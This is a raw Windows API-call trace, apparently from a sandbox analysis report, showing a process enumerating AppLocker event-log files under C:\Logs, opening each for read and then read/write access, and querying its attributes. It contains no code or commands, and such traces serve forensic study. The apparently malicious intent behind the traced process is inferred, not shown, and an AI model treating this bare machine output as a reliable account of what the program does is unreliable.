RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0071.470] AreFileApisANSI () returned 1 [0071.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0071.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76098 [0071.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 54 [0071.470] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.470] GetFileType (hFile=0x428) returned 0x1 [0071.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.470] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.471] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.471] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.471] CloseHandle (hObject=0x428) returned 1 [0071.471] AreFileApisANSI () returned 1 [0071.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0071.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0071.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 54 [0071.471] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.471] GetFileType (hFile=0x428) returned 0x1 [0071.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.471] CloseHandle (hObject=0x428) returned 1 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.472] AreFileApisANSI () returned 1 [0071.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0071.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0071.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 54 [0071.472] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.472] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0071.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0071.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.474] AreFileApisANSI () returned 1 [0071.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpUsedDefaultChar=0x0) returned 57 [0071.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.474] AreFileApisANSI () returned 1 [0071.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0071.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 57 [0071.474] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.474] GetFileType (hFile=0x428) returned 0x1 [0071.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0071.474] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.474] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.475] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.475] CloseHandle (hObject=0x428) returned 1 [0071.475] AreFileApisANSI () returned 1 [0071.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0071.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 57 [0071.475] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.475] GetFileType (hFile=0x428) returned 0x1 [0071.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0071.475] CloseHandle (hObject=0x428) returned 1 [0071.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.476] AreFileApisANSI () returned 1 [0071.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0071.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 57 [0071.476] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.476] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0071.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x26df0 [0071.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.478] AreFileApisANSI () returned 1 [0071.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpUsedDefaultChar=0x0) returned 66 [0071.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0071.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0071.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.478] AreFileApisANSI () returned 1 [0071.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0071.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82688 [0071.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 66 [0071.478] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.479] GetFileType (hFile=0x428) returned 0x1 [0071.479] HeapFree 